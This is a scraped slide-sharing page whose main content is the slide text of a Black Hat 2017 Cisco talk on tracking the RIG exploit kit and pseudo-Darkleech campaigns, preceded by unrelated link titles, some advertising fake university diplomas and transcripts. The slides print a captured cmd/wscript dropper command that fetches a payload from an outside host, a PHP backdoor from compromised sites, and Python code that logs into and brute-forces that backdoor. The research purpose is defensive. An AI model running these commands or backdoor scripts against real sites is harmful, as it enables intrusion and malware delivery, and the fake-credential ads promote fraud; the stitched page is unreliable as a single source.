APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
test test test test testtest test testtest test testtest test testtest test ...
test test  test test testtest test testtest test testtest test testtest test ...test test  test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
 

Exploit Kit Cornucopia - Blackhat USA 2017

  • 1. Brad Antoniewicz (statements and opinions do not represent the views of, or have been endorsed by, our employer) Matt Foley Exploit Kit Cornucopia
  • 2. 2© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Speakers Matt Foley Intern @ Cisco Umbrella CS Major @ NYU Tandon Brad Antoniewicz Researcher @ Cisco Umbrella @brad_anton http://www.zenn.com.sg/Marketplace%20images/Speakers/Tannoy%20Berkeley%20speakers%20(2).JPG
  • 3. 3© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Agenda Background Crawling Amplifying Convictions Backdoored Disposable Mailboxes http://fc06.deviantart.net/fs70/i/2013/248/4/3/bearshark_blueprints_wallpaper_1600x900_by_dangerousdeven-d6l544l.png
  • 4.
  • 5.
  • 6. 6© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  • 7. 7© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Pseudo-Darkleech Campaign Using Rig Exploit Kit
  • 8. 8© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Kit Script Ransomware , Trojan, etc...
  • 9. 9© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",…….x);j./**/run("cmd"+E+" /c "+x,0)}catch(_x){};q.Deletefile(K);>o32.tmp && start wscript //B //E:JScript o32.tmp "gexywoaxor" "http://free.fabuloussatchi.com/?qtuif=4979&q=[REDACTED]&ct=diamond&oq=[REDACTED]" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"
  • 10. 10© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Landing Page Injection Compromised Site Ad Net. Subscriber Staged Site (Ad) Victim Malvertising Compromised Site RIG Server Gets lander (proxy) Step 1.
  • 11. 11© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Filtering Compromised Site Ad Net. Subscriber Staged Site (Ad) RIG Server Victim Malvertising Compromised Site Gets ‘proxy’ TDS/Crawler Filtering TDS TDS, Browser, IP, Region, Time Step 1.
  • 12. 12© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  • 13. 13© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  • 14. 14© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Delivery Victim Step 1. Step 2. Render iframe Lander Virtual Dedicated Server (VDS) Gets exploit
  • 15. 15© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  • 16. 16© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Regurgitation CVE-2015-8651 (Flash) CVE-2015-0311 (Flash) CVE-2016-4117 (Flash) CVE-2016-0189 (IE) CVE-2015-2419 (IE)
  • 17. 17© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential https://www.bleepstatic.com/swr-guides/h/hoeflertext/firefox/HoeflerText-font-missing-firefox.jpg http://www.malware-traffic-analysis.net/2017/02/22/2017-02-22-EITest-HoeflerText-Chrome-popup-image-04.jpg
  • 18. 18© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential ektracker.com Special thanks to @cyber_attacks, @nao_sec, @ektracker, @executemalware
  • 19. 19© 2017 Cisco and/or its affiliates. All rights reserved. Cisco ConfidentialIP/ASN relationships
  • 20. 20© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Domains/Registrants
  • 21. 21© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraping
  • 22. 22© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V1 Orchestration Domains in queue Worker Worker
  • 23. 23© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V1 Worker DOM Query site twice, then diff dom/source Requests source Filters
  • 24. 24© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Popularity and Spike Google.com Lander
  • 25. 25© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proxy V1 BLOCKED
  • 26. 26© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V2 Candidate 1 EK Decoder Module Candidate 2 Candidate 3 Browser (requests) Browser (requests) Detector Module
  • 27. 27© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Decoder Module Lander Source and suspected EK passed to decoder EK Decoder Module Flash exploits, executables, etc. Decoder parses JS and identifies EK artifacts
  • 28. 28© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proxy V2 Rotating IPsChoice of regionSquid Proxy
  • 29. 29© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sources for Scraping ektracker.com malware-traffic-analysis.net zerophagemalware.com broadanalysis.com malwarebreakdown.com Credit: @nao_sec (Where to get suspected exploit kit sites)
  • 30. 30© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential https://culturedcode.com/things/iphone/makingof/List-02-Sketch.jpg https://s-media-cache-ak0.pinimg.com/736x/51/41/b1/5141b1839f3c8484cf510750044366f7.jpg Amplifying Convictions with Hitlist
  • 31. 31© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  • 32. 32© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Compromised Site: Unknown Backend Logs Gate: Known
  • 33. 33© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Conviction: Amplified! S3 Lambda if host in eks: s3.put_object(...) Logs EK List Candidates Filter Convict
  • 34. 34© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Teamwork makes the dream work Scraper: Finds Landers, Confirms HitList detections HitList: Finds compromised sites
  • 35. 35© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Show graphic of detections! Fancy D3 graph goes here Gates to compromised sites
  • 36. 36© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoored
  • 37. 37© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Campaign Orchestration Compromised Sites preg_replace(‘/12/e’,$code,‘12’) nav-menu.php backdoor (pseudo-darkleech) Attacker eval()
  • 38. 38© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoor Obfuscation and ‘Security’ $_passssword = '0a02419ec68460d4a320c53b680441ff'; if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); nav-menu.php backdoor
  • 39. 39© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential '0a02419ec68460d4a320c53b680441ff'
  • 40. 40© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential $url = decrypt_url(‘a3d3czksLDIx………NDkyMzI7MjA0OTEzMjA=’); nav-menu.php backdoor
  • 41. 41© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential /blog/?manchester&utm_source=82267:1021107:2013 userid?flowid?
  • 42. 42© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential /blog/?manchester&utm_source=82267:1021107:2013 userid?flowid? /blog/?manchester&utm_source=65857:1018137:2013 /blog/?manchester&utm_source=50426:1022174:2013 /blog/?manchester&utm_source=77620:1019894:2013 /blog/?manchester&utm_source=33398:1017062:2013
  • 43. 43© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoor access pw = hashlib.md5(‘1021107’).hexdigest() data = { pw: ‘preg_match’, ‘a’: ‘//e’, ‘c’: ‘some_php_code’ } requests.post(compromised_site, data=data)
  • 44. 44© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential nginx Apache Reasonable, but still good for us awwwyisssss
  • 45. 45© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Brute Forcing data = { ‘a’: ‘//e’, ‘c’: ‘some_php_code’ } for i in range(1010000, 1030000): pw = hashlib.md5(str(i)).hexdigest() data[pw] = ‘preg_match’ requests.post(compromised_site, data=data)
  • 46. 46© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential POST Data
  • 47. 47© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Bypassing Filtering Compromised Site Staged Site (Ad) RIG Server Request new gates, spoof UserAgent, Source IP, etc..
  • 48. 48© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Reliable EK Server Hosting
  • 49. 49© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Disposable Mailboxes
  • 50. 50© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Not good for research
  • 52. 52© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential MailRunnerIdentifying ransomware and commodity malware Bait Mailboxes Block Dewey Classification Engine Convict, then pass on email attributes
  • 53. 53© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Detections (One mailbox) 7.4k Malicious Emails 15k Unique Domains @brad_anton
  • 54. 54© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential lacedmail.com
  • 55. 55© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Little Things
  • 56. 56© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  • 57. 57© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
  • 58. 58© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Recap Good for researchBad guy mistakes :)Amplify convictionsRoll your own scraper/proxy